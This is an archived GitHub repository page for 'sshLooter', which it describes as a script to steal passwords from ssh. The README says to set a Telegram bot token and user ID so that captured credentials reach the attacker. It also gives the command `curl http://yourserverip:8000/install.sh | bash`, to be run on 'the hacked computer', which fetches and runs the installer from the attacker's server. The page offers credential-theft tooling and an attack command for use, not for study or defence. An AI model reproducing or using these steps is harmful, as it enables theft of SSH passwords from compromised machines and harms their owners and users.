Skip to content
This repository has been archived by the owner on Jan 1, 2019. It is now read-only.

mthbernardes/sshLooter

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 

Repository files navigation

DON'T USE THIS

There's a C version which is much better sshLooterC

sshLooter

Script to steal passwords from ssh.

Install

git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration

Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.

Usage

On your server execute.
python -m SimpleHTTPServer

On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash

Original script from

ChokePoint

My post about this script

Stealing SSH credentials Another Approach.

About

Script to steal passwords from ssh.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published